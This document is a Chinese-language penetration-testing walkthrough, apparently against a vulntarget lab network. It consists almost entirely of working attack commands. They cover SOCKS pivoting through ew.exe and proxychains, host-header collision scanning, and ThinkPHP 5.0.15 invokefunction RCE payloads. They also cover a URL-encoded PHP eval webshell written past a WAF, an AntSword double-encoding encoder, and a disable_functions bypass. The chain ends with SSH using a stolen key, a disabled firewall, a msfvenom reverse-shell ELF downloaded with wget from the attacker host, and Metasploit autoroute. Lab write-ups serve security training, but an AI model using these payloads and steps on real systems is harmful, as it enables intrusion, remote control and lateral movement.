内网代理HOST碰撞攻击函数绕过MSF上线

upload /home/z4pts/桌面/ew.exe C:\\Users\\Administrator\\

C:\Users\Administrator\ew.exe -s ssocksd -l 8090

vi /etc/proxychains4.confsocks5 192.168.1.5 8090

proxychains curl http://myip.ipip.net/   //开玩笑

proxychains nmap -Pn -T4 -sT -p- 192.168.100.131

22/80/8888

http://192.168.100.131:80/http://192.168.100.131:8888/

python3 dirsearch.py -u http://192.168.100.131/ --proxy socks5://192.168.1.5:8090

run post/windows/gather/forensics/browser_history

/root/.msf4/local/Administrator_Firefox_mpf91asw.default-release_places.sqlitemv /root/.msf4/....sqlite /home/z4pts/桌面

选中文件右键--》用"SQLite database browser"打开 执行以下命令SELECT url FROM moz_places

http://192.168.100.131/vulntarget/thinkphphttp://192.168.100.131/vulntarget/public/index.php

https://github.com/fofapro/Hosts_scan

proxychains python3 IP_hosts_scan_multithreading.py

192.168.100.131 --》 http://www.cJO6w10YLS.com

Host  --》 www.cJO6w10YLS.com

http://192.168.100.131/vulntarget/public/index.php?s=1  //报错信息：V5.0.15
#POC?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami   //system函数被禁用?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=sassert&vars[1][]=phpinfo()   //被BTWAF拦截

#file_put_contents写文件?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=1.php&vars[1][1]=<?php $url = "php";$p ="info();";$c=$url.$p;assert($c);?> //无权限
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=../../123.php&vars[1][1]=<?php $url = "php";$p ="info();";$c=$url.$p;assert($c);?>
#GetShell?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=../../url.php&vars[1][1]=<?php%20eval(urldecode(urldecode(urldecode($_REQUEST[cmd]))));?>
#WebShellhttp://192.168.100.131/url.php

#编码配置AntSword-->编码设置-->编码管理-->新建编码器-->PHP-->在创建编码器命名为url-->点击编辑-->将以下代码贴入替换并保存！

#编码内容'use strict';
  // ##########    请在下方编写你自己的代码   ###################function forceEncode(s) {  return Array.from(s).map(i=>'%'+i.charCodeAt(0).toString(16).padStart(2,'0')).join('')}
module.exports = (pwd, data, ext={}) => {  const payload = data['_']  data[pwd] = forceEncode(forceEncode(payload));  delete data['_'];  console.log(data);  return data;}

#项目地址https://github.com/devil8123665/exploits/blob/master/php7-gc-bypass/exploit.php在蚁剑中创建by.php并将以上项目文件的项目代码保存在浏览器访问...
#访问地址http://192.168.100.131/by.php

#私钥文件/home/vulntarget/key
#连接命令proxychains ssh -i key 192.168.100.131

id  --》 UID：0whoami --》rootping www.baidu.com  --》不出网ifconfig  --》 192.168.100.0/24  192.168.88.100/24 arp -a    --》 192.168.88.102主机信息ufw disable --》关闭防火墙,不然无法与边界主机进行正常通信！！！iptables -L --》查看防火墙规则

#边界主机Import-Module .\Ladon.ps1ladon web 3333 dirC:\Windows\System32\WindowsPowerShell\v1.0\
#生成后门msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=3333 -f elf > shell.elf

#开启监听msfconsoleuse exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.100.155set lport 3333run
#下载执行wget http://192.168.100.155:3333/shell.elf -O shell.elf
#scp传递执行proxychains scp -r -i key /home/z4pts/桌面/shell.elf [email protected]:/www/wwwroot/vulntarget-e2/1.elf
#添加路由use post/multi/manage/autorouteset session 2run

iptables -A INPUT -j ACCEPTiptables -A OUTPUT -j ACCEPT